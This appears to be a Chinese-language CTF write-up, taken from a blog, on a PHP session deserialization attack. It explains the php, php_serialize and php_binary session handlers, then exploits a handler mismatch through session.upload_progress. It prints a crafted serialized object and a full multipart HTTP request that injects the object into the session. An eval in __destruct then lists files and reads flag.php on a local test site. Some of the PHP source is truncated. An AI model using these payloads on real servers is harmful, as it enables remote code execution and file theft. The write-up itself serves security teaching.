- php存储session的三种模式
| php_serialize(php=>5.5.4) | 经过serialize()函数序列化数组 |
| php | 键名+竖线+经过seralize()序列处理的值 |
| php_biary | 键名的长度对应ASCII字符+键名+serialize()序列化的值 |
测试代码
//ini_set("session.serialize_handler", "php");
//ini_set("session.serialize_handler", "php_serialize");
ini_set("session.serialize_handler", "php_binary");
session_start();
$_SESSION['moonsec'] = $_GET['moonsec'];
序列化存储格式
php
moonsec|s:3:"123";
php_serialize
a:1:{s:7:"moonsec";s:3:"123";}
php_binary
<0x07>moonsecs:3:"123";
2.CTF题目
mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); }}if(isset($_GET['phpinfo'])){ $m = new CTF();}else{ highlight_string(file_get_contents('index.php'));}?>条件
- session.serialize_handler php 局部变量 php_serialize 主变量
- session.upload_progress.cleanup 默认开启 现关闭
- session.upload_progress.enabled 默认开启
php bug
PHP :: Doc Bug #71101 :: serialize_handler must not be switched for existing sessions
session.upload_progress.enabled On
session.upload_progress.enabled本身作用不大,是用来检测一个文件上传的进度。但当一个文件上传时,同时POST一个与php.ini中session.upload_progress.name同名的变量时(session.upload_progress.name的变量值默认为PHP_SESSION_UPLOAD_PROGRESS),PHP检测到这种同名请求会在$_SESSION中添加一条数据。由此来设置session
序列化
mdzz = 'print_r(scandir(dirname(__FILE__)));'; } function __destruct() { eval($this->mdzz); }}$m = new CTF();echo serialize($m);?>O:3:"CTF":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";} 上传表单
upload |O:3:\"CTF\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
读flag
O:3:"CTF":1:{s:4:"mdzz";s:83:"print_r(file_get_contents("D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php"));"; |O:3:\"CTF\":1:{s:4:\"mdzz\";s:83:\"print_r(file_get_contents(\"D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php\"));\"; 
POST /ctf/demo3/index.php HTTP/1.1
Host: www.test1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11171372103466141198728743662
Content-Length: 39314
Origin: http://www.test1.com
Connection: close
Referer: http://www.test1.com/ctf/demo3/upload.html
Cookie: PHPSESSID=p13eoiiiq3rp69k85an1d2idbu
Upgrade-Insecure-Requests: 1
-----------------------------11171372103466141198728743662
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
1
-----------------------------11171372103466141198728743662
Content-Disposition: form-data; name="file"; filename="|O:3:\"CTF\":1:{s:4:\"mdzz\";s:83:\"print_r(file_get_contents(\"D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php\"));\";}
Content-Type: image/png
来源地址:https://blog.csdn.net/yyj1781572/article/details/128189552
